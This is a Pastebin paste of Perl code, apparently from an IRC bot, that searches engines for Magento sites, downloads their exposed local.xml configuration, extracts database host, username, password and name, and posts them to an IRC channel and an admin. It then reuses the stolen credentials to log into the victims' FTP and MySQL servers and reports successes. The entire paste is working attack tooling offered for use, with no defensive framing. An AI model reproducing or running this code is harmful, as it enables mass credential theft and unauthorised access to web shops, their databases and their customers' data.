Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sub magento() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$mglogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$mglogo15(7@2$engine15)0,1 THE END "); }
- my $vuln = "http://".$site."/app/etc/local.xml";
- my $html = &get_content($vuln);
- if ($html =~ /dbname/i) {
- my $serverIP ="";
- if ($html =~ /<host><!\[\CDATA\[(.*)\]\]\><\/host>/) {$serverIP=$1;}
- if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;}
- if ($html =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;}
- if ($html =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;}
- &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]hostname:2".$serverIP."");
- &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]username:2".$user."");
- &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]password:2".$pass."");
- &msg("$chan","$mglogo(7@2$engine15)14http://".$site." 12[+]dbname :2".$dbname."");
- if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];}
- my $ceklog = "ftp://".$usr.":".$pass."@".$site."";
- my $ceklog2 = "ftp://".$user.":".$pass."@".$site."";
- my $ftplog = &get_content($ceklog);
- my $ftplog2 = &get_content($ceklog2);
- if ($ftplog =~ /ftp/) {
- &msg("$admin","12[+]$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$usr." [+]password:".$pass."");
- &msg("$chan","12[+]$$mglogo4$engine 12FTP[+]Success send To Admin");
- }
- if ($ftplog2 =~ /ftp/) {
- &msg("$admin","12[+]$$mglogo4$engine 12FTP[+] 14ftp://".$site." [+]username:".$user." [+]password:".$pass."");
- &msg("$chan","12[+]$$mglogo4$engine 12FTP[+]Success send To Admin");
- }
- my $hosts = "http://".$site;
- if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
- $host = $2;
- &dbi_connect($host,$user,$pass,$dbname,$chan,$engine,$mglogo);sleep(1);
- &msg("$chan","!ftp ".$host." ".$user." ".$pass."");
- if ($dbname =~ /_/) {@users = split("_",$dbname); $dbuser = $users[0]; }
- &ftp_connect($url,$host,$dbuser,$pass,$chan,$engine,$mglogo);sleep(1);
- &msg("$chan","!ftp ".$host." ".$dbuser." ".$pass."");
- } }
- }
- }
- }
- ##################################################################################
- sub ftp_connect {
- my $url = $_[0];
- my $host = $_[1];
- my $user = $_[2];
- my $pass = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $success = 1;
- use Net::FTP;
- my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
- $success = 0 if $ftp->login($user,$pass);
- $ftp->quit;
- if ($success == 0) {
- &msg("$admin","$logo4$engine 5,1<=>9,1FTP Accepted 5<=>4 http://".$host." |7 ".$user.":".$pass." ");sleep(2);
- }
- }
- sub dbi_connect () {
- my $host = $_[0];
- my $user = $_[1];
- my $pass = $_[2];
- my $dtbs = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $port = "3306";
- my $platform = "mysql";
- my $dsn = "dbi:$platform:$dtbs:$host:$port";
- my $DBIconnect= DBI->connect($dsn,$user,$pass);
- if ($DBIconnect) {
- &msg("$chan","$logo4$engine 5,1<=>9,1SQL Accepted 5<=> 4[+]15 http://".$host." 4[+]13username:15".$user." 4[+]13password:15".$pass." 4[+]13dbname:15".$dbname."");
- &msg("$admin","$logo4$engine 5,1<=>9,1SQL Accepted 5<=> 4[+]15 http://".$host." 4[+]13username:15".$user." 4[+]13password:15".$pass." 4[+]13dbname:15".$dbname."");
- }
- }
- sub getUserPass() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- foreach my $line (@lol) {
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass;
- }
- sub getinfo() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- my $dbs = "";
- foreach my $line (@lol) {
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
- $dbs = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement